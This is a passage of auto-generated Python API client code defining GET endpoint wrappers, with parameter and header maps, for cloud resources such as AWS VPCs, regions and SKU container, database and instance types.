'endpoint_path': '/api/v1/cloud/AwsVpcs/{Moid}',
'operation_id': 'get_cloud_aws_vpc_by_moid',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'moid',
],
'required': [
'moid',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'moid':
(str,),
},
'attribute_map': {
'moid': 'Moid',
},
'location_map': {
'moid': 'path',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json',
'text/csv',
'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet'
],
'content_type': [],
},
api_client=api_client,
callable=__get_cloud_aws_vpc_by_moid
)
def __get_cloud_aws_vpc_list(
self,
**kwargs
):
"""Read a 'cloud.AwsVpc' resource. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_cloud_aws_vpc_list(async_req=True)
>>> result = thread.get()
Keyword Args:
filter (str): Filter criteria for the resources to return. A URI with a $filter query option identifies a subset of the entries from the Collection of Entries. The subset is determined by selecting only the Entries that satisfy the predicate expression specified by the $filter option. The expression language that is used in $filter queries supports references to properties and literals. The literal values can be strings enclosed in single quotes, numbers and boolean values (true or false).. [optional] if omitted the server will use the default value of ""
orderby (str): Determines what properties are used to sort the collection of resources.. [optional]
top (int): Specifies the maximum number of resources to return in the response.. [optional] if omitted the server will use the default value of 100
skip (int): Specifies the number of resources to skip in the response.. [optional] if omitted the server will use the default value of 0
select (str): Specifies a subset of properties to return.. [optional] if omitted the server will use the default value of ""
expand (str): Specify additional attributes or related resources to return in addition to the primary resources.. [optional]
apply (str): Specify one or more transformation operations to perform aggregation on the resources. The transformations are processed in order with the output from a transformation being used as input for the subsequent transformation. The \"$apply\" query takes a sequence of set transformations, separated by forward slashes to express that they are consecutively applied, i.e. the result of each transformation is the input to the next transformation. Supported aggregation methods are \"aggregate\" and \"groupby\". The **aggregate** transformation takes a comma-separated list of one or more aggregate expressions as parameters and returns a result set with a single instance, representing the aggregated value for all instances in the input set. The **groupby** transformation takes one or two parameters and 1. Splits the initial set into subsets where all instances in a subset have the same values for the grouping properties specified in the first parameter, 2. Applies set transformations to each subset according to the second parameter, resulting in a new set of potentially different structure and cardinality, 3. Ensures that the instances in the result set contain all grouping properties with the correct values for the group, 4. Concatenates the intermediate result sets into one result set. A groupby transformation affects the structure of the result set.. [optional]
count (bool): The $count query specifies the service should return the count of the matching resources, instead of returning the resources.. [optional]
inlinecount (str): The $inlinecount query option allows clients to request an inline count of the matching resources included with the resources in the response.. [optional] if omitted the server will use the default value of "allpages"
at (str): Similar to \"$filter\", but \"at\" is specifically used to filter versioning information properties for resources to return. A URI with an \"at\" Query Option identifies a subset of the Entries from the Collection of Entries identified by the Resource Path section of the URI. The subset is determined by selecting only the Entries that satisfy the predicate expression specified by the query option. The expression language that is used in at operators supports references to properties and literals. The literal values can be strings enclosed in single quotes, numbers and boolean values (true or false) or any of the additional literal representations shown in the Abstract Type System section.. [optional]
tags (str): The 'tags' parameter is used to request a summary of the Tag utilization for this resource. When the 'tags' parameter is specified, the response provides a list of tag keys, the number of times the key has been used across all documents, and the tag values that have been assigned to the tag key.. [optional]
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
CloudAwsVpcResponse
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
return self.call_with_http_info(**kwargs)
self.get_cloud_aws_vpc_list = _Endpoint(
settings={
'response_type': (CloudAwsVpcResponse,),
'auth': [
'cookieAuth',
'http_signature',
'oAuth2',
'oAuth2'
],
'endpoint_path': '/api/v1/cloud/AwsVpcs',
'operation_id': 'get_cloud_aws_vpc_list',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'filter',
'orderby',
'top',
'skip',
'select',
'expand',
'apply',
'count',
'inlinecount',
'at',
'tags',
],
'required': [],
'nullable': [
],
'enum': [
'inlinecount',
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
('inlinecount',): {
"ALLPAGES": "allpages",
"NONE": "none"
},
},
'openapi_types': {
'filter':
(str,),
'orderby':
(str,),
'top':
(int,),
'skip':
(int,),
'select':
(str,),
'expand':
(str,),
'apply':
(str,),
'count':
(bool,),
'inlinecount':
(str,),
'at':
(str,),
'tags':
(str,),
},
'attribute_map': {
'filter': '$filter',
'orderby': '$orderby',
'top': '$top',
'skip': '$skip',
'select': '$select',
'expand': '$expand',
'apply': '$apply',
'count': '$count',
'inlinecount': '$inlinecount',
'at': 'at',
'tags': 'tags',
},
'location_map': {
'filter': 'query',
'orderby': 'query',
'top': 'query',
'skip': 'query',
'select': 'query',
'expand': 'query',
'apply': 'query',
'count': 'query',
'inlinecount': 'query',
'at': 'query',
'tags': 'query',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json',
'text/csv',
'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet'
],
'content_type': [],
},
api_client=api_client,
callable=__get_cloud_aws_vpc_list
)
def __get_cloud_regions_by_moid(
self,
moid,
**kwargs
):
"""Read a 'cloud.Regions' resource. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_cloud_regions_by_moid(moid, async_req=True)
>>> result = thread.get()
Args:
moid (str): The unique Moid identifier of a resource instance.
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
CloudRegions
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['moid'] = \
moid
return self.call_with_http_info(**kwargs)
self.get_cloud_regions_by_moid = _Endpoint(
settings={
'response_type': (CloudRegions,),
'auth': [
'cookieAuth',
'http_signature',
'oAuth2',
'oAuth2'
],
'endpoint_path': '/api/v1/cloud/Regions/{Moid}',
'operation_id': 'get_cloud_regions_by_moid',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'moid',
],
'required': [
'moid',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'moid':
(str,),
},
'attribute_map': {
'moid': 'Moid',
},
'location_map': {
'moid': 'path',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json',
'text/csv',
'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet'
],
'content_type': [],
},
api_client=api_client,
callable=__get_cloud_regions_by_moid
)
def __get_cloud_regions_list(
self,
**kwargs
):
"""Read a 'cloud.Regions' resource. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_cloud_regions_list(async_req=True)
>>> result = thread.get()
Keyword Args:
filter (str): Filter criteria for the resources to return. A URI with a $filter query option identifies a subset of the entries from the Collection of Entries. The subset is determined by selecting only the Entries that satisfy the predicate expression specified by the $filter option. The expression language that is used in $filter queries supports references to properties and literals. The literal values can be strings enclosed in single quotes, numbers and boolean values (true or false).. [optional] if omitted the server will use the default value of ""
orderby (str): Determines what properties are used to sort the collection of resources.. [optional]
top (int): Specifies the maximum number of resources to return in the response.. [optional] if omitted the server will use the default value of 100
skip (int): Specifies the number of resources to skip in the response.. [optional] if omitted the server will use the default value of 0
select (str): Specifies a subset of properties to return.. [optional] if omitted the server will use the default value of ""
expand (str): Specify additional attributes or related resources to return in addition to the primary resources.. [optional]
apply (str): Specify one or more transformation operations to perform aggregation on the resources. The transformations are processed in order with the output from a transformation being used as input for the subsequent transformation. The \"$apply\" query takes a sequence of set transformations, separated by forward slashes to express that they are consecutively applied, i.e. the result of each transformation is the input to the next transformation. Supported aggregation methods are \"aggregate\" and \"groupby\". The **aggregate** transformation takes a comma-separated list of one or more aggregate expressions as parameters and returns a result set with a single instance, representing the aggregated value for all instances in the input set. The **groupby** transformation takes one or two parameters and 1. Splits the initial set into subsets where all instances in a subset have the same values for the grouping properties specified in the first parameter, 2. Applies set transformations to each subset according to the second parameter, resulting in a new set of potentially different structure and cardinality, 3. Ensures that the instances in the result set contain all grouping properties with the correct values for the group, 4. Concatenates the intermediate result sets into one result set. A groupby transformation affects the structure of the result set.. [optional]
count (bool): The $count query specifies the service should return the count of the matching resources, instead of returning the resources.. [optional]
inlinecount (str): The $inlinecount query option allows clients to request an inline count of the matching resources included with the resources in the response.. [optional] if omitted the server will use the default value of "allpages"
at (str): Similar to \"$filter\", but \"at\" is specifically used to filter versioning information properties for resources to return. A URI with an \"at\" Query Option identifies a subset of the Entries from the Collection of Entries identified by the Resource Path section of the URI. The subset is determined by selecting only the Entries that satisfy the predicate expression specified by the query option. The expression language that is used in at operators supports references to properties and literals. The literal values can be strings enclosed in single quotes, numbers and boolean values (true or false) or any of the additional literal representations shown in the Abstract Type System section.. [optional]
tags (str): The 'tags' parameter is used to request a summary of the Tag utilization for this resource. When the 'tags' parameter is specified, the response provides a list of tag keys, the number of times the key has been used across all documents, and the tag values that have been assigned to the tag key.. [optional]
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
CloudRegionsResponse
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
return self.call_with_http_info(**kwargs)
self.get_cloud_regions_list = _Endpoint(
settings={
'response_type': (CloudRegionsResponse,),
'auth': [
'cookieAuth',
'http_signature',
'oAuth2',
'oAuth2'
],
'endpoint_path': '/api/v1/cloud/Regions',
'operation_id': 'get_cloud_regions_list',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'filter',
'orderby',
'top',
'skip',
'select',
'expand',
'apply',
'count',
'inlinecount',
'at',
'tags',
],
'required': [],
'nullable': [
],
'enum': [
'inlinecount',
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
('inlinecount',): {
"ALLPAGES": "allpages",
"NONE": "none"
},
},
'openapi_types': {
'filter':
(str,),
'orderby':
(str,),
'top':
(int,),
'skip':
(int,),
'select':
(str,),
'expand':
(str,),
'apply':
(str,),
'count':
(bool,),
'inlinecount':
(str,),
'at':
(str,),
'tags':
(str,),
},
'attribute_map': {
'filter': '$filter',
'orderby': '$orderby',
'top': '$top',
'skip': '$skip',
'select': '$select',
'expand': '$expand',
'apply': '$apply',
'count': '$count',
'inlinecount': '$inlinecount',
'at': 'at',
'tags': 'tags',
},
'location_map': {
'filter': 'query',
'orderby': 'query',
'top': 'query',
'skip': 'query',
'select': 'query',
'expand': 'query',
'apply': 'query',
'count': 'query',
'inlinecount': 'query',
'at': 'query',
'tags': 'query',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json',
'text/csv',
'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet'
],
'content_type': [],
},
api_client=api_client,
callable=__get_cloud_regions_list
)
def __get_cloud_sku_container_type_by_moid(
self,
moid,
**kwargs
):
"""Read a 'cloud.SkuContainerType' resource. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_cloud_sku_container_type_by_moid(moid, async_req=True)
>>> result = thread.get()
Args:
moid (str): The unique Moid identifier of a resource instance.
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
CloudSkuContainerType
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['moid'] = \
moid
return self.call_with_http_info(**kwargs)
self.get_cloud_sku_container_type_by_moid = _Endpoint(
settings={
'response_type': (CloudSkuContainerType,),
'auth': [
'cookieAuth',
'http_signature',
'oAuth2',
'oAuth2'
],
'endpoint_path': '/api/v1/cloud/SkuContainerTypes/{Moid}',
'operation_id': 'get_cloud_sku_container_type_by_moid',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'moid',
],
'required': [
'moid',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'moid':
(str,),
},
'attribute_map': {
'moid': 'Moid',
},
'location_map': {
'moid': 'path',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json',
'text/csv',
'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet'
],
'content_type': [],
},
api_client=api_client,
callable=__get_cloud_sku_container_type_by_moid
)
def __get_cloud_sku_container_type_list(
self,
**kwargs
):
"""Read a 'cloud.SkuContainerType' resource. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_cloud_sku_container_type_list(async_req=True)
>>> result = thread.get()
Keyword Args:
filter (str): Filter criteria for the resources to return. A URI with a $filter query option identifies a subset of the entries from the Collection of Entries. The subset is determined by selecting only the Entries that satisfy the predicate expression specified by the $filter option. The expression language that is used in $filter queries supports references to properties and literals. The literal values can be strings enclosed in single quotes, numbers and boolean values (true or false).. [optional] if omitted the server will use the default value of ""
orderby (str): Determines what properties are used to sort the collection of resources.. [optional]
top (int): Specifies the maximum number of resources to return in the response.. [optional] if omitted the server will use the default value of 100
skip (int): Specifies the number of resources to skip in the response.. [optional] if omitted the server will use the default value of 0
select (str): Specifies a subset of properties to return.. [optional] if omitted the server will use the default value of ""
expand (str): Specify additional attributes or related resources to return in addition to the primary resources.. [optional]
apply (str): Specify one or more transformation operations to perform aggregation on the resources. The transformations are processed in order with the output from a transformation being used as input for the subsequent transformation. The \"$apply\" query takes a sequence of set transformations, separated by forward slashes to express that they are consecutively applied, i.e. the result of each transformation is the input to the next transformation. Supported aggregation methods are \"aggregate\" and \"groupby\". The **aggregate** transformation takes a comma-separated list of one or more aggregate expressions as parameters and returns a result set with a single instance, representing the aggregated value for all instances in the input set. The **groupby** transformation takes one or two parameters and 1. Splits the initial set into subsets where all instances in a subset have the same values for the grouping properties specified in the first parameter, 2. Applies set transformations to each subset according to the second parameter, resulting in a new set of potentially different structure and cardinality, 3. Ensures that the instances in the result set contain all grouping properties with the correct values for the group, 4. Concatenates the intermediate result sets into one result set. A groupby transformation affects the structure of the result set.. [optional]
count (bool): The $count query specifies the service should return the count of the matching resources, instead of returning the resources.. [optional]
inlinecount (str): The $inlinecount query option allows clients to request an inline count of the matching resources included with the resources in the response.. [optional] if omitted the server will use the default value of "allpages"
at (str): Similar to \"$filter\", but \"at\" is specifically used to filter versioning information properties for resources to return. A URI with an \"at\" Query Option identifies a subset of the Entries from the Collection of Entries identified by the Resource Path section of the URI. The subset is determined by selecting only the Entries that satisfy the predicate expression specified by the query option. The expression language that is used in at operators supports references to properties and literals. The literal values can be strings enclosed in single quotes, numbers and boolean values (true or false) or any of the additional literal representations shown in the Abstract Type System section.. [optional]
tags (str): The 'tags' parameter is used to request a summary of the Tag utilization for this resource. When the 'tags' parameter is specified, the response provides a list of tag keys, the number of times the key has been used across all documents, and the tag values that have been assigned to the tag key.. [optional]
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
CloudSkuContainerTypeResponse
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
return self.call_with_http_info(**kwargs)
self.get_cloud_sku_container_type_list = _Endpoint(
settings={
'response_type': (CloudSkuContainerTypeResponse,),
'auth': [
'cookieAuth',
'http_signature',
'oAuth2',
'oAuth2'
],
'endpoint_path': '/api/v1/cloud/SkuContainerTypes',
'operation_id': 'get_cloud_sku_container_type_list',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'filter',
'orderby',
'top',
'skip',
'select',
'expand',
'apply',
'count',
'inlinecount',
'at',
'tags',
],
'required': [],
'nullable': [
],
'enum': [
'inlinecount',
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
('inlinecount',): {
"ALLPAGES": "allpages",
"NONE": "none"
},
},
'openapi_types': {
'filter':
(str,),
'orderby':
(str,),
'top':
(int,),
'skip':
(int,),
'select':
(str,),
'expand':
(str,),
'apply':
(str,),
'count':
(bool,),
'inlinecount':
(str,),
'at':
(str,),
'tags':
(str,),
},
'attribute_map': {
'filter': '$filter',
'orderby': '$orderby',
'top': '$top',
'skip': '$skip',
'select': '$select',
'expand': '$expand',
'apply': '$apply',
'count': '$count',
'inlinecount': '$inlinecount',
'at': 'at',
'tags': 'tags',
},
'location_map': {
'filter': 'query',
'orderby': 'query',
'top': 'query',
'skip': 'query',
'select': 'query',
'expand': 'query',
'apply': 'query',
'count': 'query',
'inlinecount': 'query',
'at': 'query',
'tags': 'query',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json',
'text/csv',
'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet'
],
'content_type': [],
},
api_client=api_client,
callable=__get_cloud_sku_container_type_list
)
def __get_cloud_sku_database_type_by_moid(
self,
moid,
**kwargs
):
"""Read a 'cloud.SkuDatabaseType' resource. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_cloud_sku_database_type_by_moid(moid, async_req=True)
>>> result = thread.get()
Args:
moid (str): The unique Moid identifier of a resource instance.
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
CloudSkuDatabaseType
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['moid'] = \
moid
return self.call_with_http_info(**kwargs)
self.get_cloud_sku_database_type_by_moid = _Endpoint(
settings={
'response_type': (CloudSkuDatabaseType,),
'auth': [
'cookieAuth',
'http_signature',
'oAuth2',
'oAuth2'
],
'endpoint_path': '/api/v1/cloud/SkuDatabaseTypes/{Moid}',
'operation_id': 'get_cloud_sku_database_type_by_moid',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'moid',
],
'required': [
'moid',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'moid':
(str,),
},
'attribute_map': {
'moid': 'Moid',
},
'location_map': {
'moid': 'path',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json',
'text/csv',
'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet'
],
'content_type': [],
},
api_client=api_client,
callable=__get_cloud_sku_database_type_by_moid
)
def __get_cloud_sku_database_type_list(
self,
**kwargs
):
"""Read a 'cloud.SkuDatabaseType' resource. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_cloud_sku_database_type_list(async_req=True)
>>> result = thread.get()
Keyword Args:
filter (str): Filter criteria for the resources to return. A URI with a $filter query option identifies a subset of the entries from the Collection of Entries. The subset is determined by selecting only the Entries that satisfy the predicate expression specified by the $filter option. The expression language that is used in $filter queries supports references to properties and literals. The literal values can be strings enclosed in single quotes, numbers and boolean values (true or false).. [optional] if omitted the server will use the default value of ""
orderby (str): Determines what properties are used to sort the collection of resources.. [optional]
top (int): Specifies the maximum number of resources to return in the response.. [optional] if omitted the server will use the default value of 100
skip (int): Specifies the number of resources to skip in the response.. [optional] if omitted the server will use the default value of 0
select (str): Specifies a subset of properties to return.. [optional] if omitted the server will use the default value of ""
expand (str): Specify additional attributes or related resources to return in addition to the primary resources.. [optional]
apply (str): Specify one or more transformation operations to perform aggregation on the resources. The transformations are processed in order with the output from a transformation being used as input for the subsequent transformation. The \"$apply\" query takes a sequence of set transformations, separated by forward slashes to express that they are consecutively applied, i.e. the result of each transformation is the input to the next transformation. Supported aggregation methods are \"aggregate\" and \"groupby\". The **aggregate** transformation takes a comma-separated list of one or more aggregate expressions as parameters and returns a result set with a single instance, representing the aggregated value for all instances in the input set. The **groupby** transformation takes one or two parameters and 1. Splits the initial set into subsets where all instances in a subset have the same values for the grouping properties specified in the first parameter, 2. Applies set transformations to each subset according to the second parameter, resulting in a new set of potentially different structure and cardinality, 3. Ensures that the instances in the result set contain all grouping properties with the correct values for the group, 4. Concatenates the intermediate result sets into one result set. A groupby transformation affects the structure of the result set.. [optional]
count (bool): The $count query specifies the service should return the count of the matching resources, instead of returning the resources.. [optional]
inlinecount (str): The $inlinecount query option allows clients to request an inline count of the matching resources included with the resources in the response.. [optional] if omitted the server will use the default value of "allpages"
at (str): Similar to \"$filter\", but \"at\" is specifically used to filter versioning information properties for resources to return. A URI with an \"at\" Query Option identifies a subset of the Entries from the Collection of Entries identified by the Resource Path section of the URI. The subset is determined by selecting only the Entries that satisfy the predicate expression specified by the query option. The expression language that is used in at operators supports references to properties and literals. The literal values can be strings enclosed in single quotes, numbers and boolean values (true or false) or any of the additional literal representations shown in the Abstract Type System section.. [optional]
tags (str): The 'tags' parameter is used to request a summary of the Tag utilization for this resource. When the 'tags' parameter is specified, the response provides a list of tag keys, the number of times the key has been used across all documents, and the tag values that have been assigned to the tag key.. [optional]
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
CloudSkuDatabaseTypeResponse
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
return self.call_with_http_info(**kwargs)
self.get_cloud_sku_database_type_list = _Endpoint(
settings={
'response_type': (CloudSkuDatabaseTypeResponse,),
'auth': [
'cookieAuth',
'http_signature',
'oAuth2',
'oAuth2'
],
'endpoint_path': '/api/v1/cloud/SkuDatabaseTypes',
'operation_id': 'get_cloud_sku_database_type_list',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'filter',
'orderby',
'top',
'skip',
'select',
'expand',
'apply',
'count',
'inlinecount',
'at',
'tags',
],
'required': [],
'nullable': [
],
'enum': [
'inlinecount',
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
('inlinecount',): {
"ALLPAGES": "allpages",
"NONE": "none"
},
},
'openapi_types': {
'filter':
(str,),
'orderby':
(str,),
'top':
(int,),
'skip':
(int,),
'select':
(str,),
'expand':
(str,),
'apply':
(str,),
'count':
(bool,),
'inlinecount':
(str,),
'at':
(str,),
'tags':
(str,),
},
'attribute_map': {
'filter': '$filter',
'orderby': '$orderby',
'top': '$top',
'skip': '$skip',
'select': '$select',
'expand': '$expand',
'apply': '$apply',
'count': '$count',
'inlinecount': '$inlinecount',
'at': 'at',
'tags': 'tags',
},
'location_map': {
'filter': 'query',
'orderby': 'query',
'top': 'query',
'skip': 'query',
'select': 'query',
'expand': 'query',
'apply': 'query',
'count': 'query',
'inlinecount': 'query',
'at': 'query',
'tags': 'query',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json',
'text/csv',
'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet'
],
'content_type': [],
},
api_client=api_client,
callable=__get_cloud_sku_database_type_list
)
def __get_cloud_sku_instance_type_by_moid(
self,
moid,
**kwargs
):
"""Read a 'cloud.SkuInstanceType' resource. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_cloud_sku_instance_type_by_moid(moid, async_req=True)
>>> result = thread.get()
Args:
moid (str): The unique Moid identifier of a resource instance.
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
CloudSkuInstanceType
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
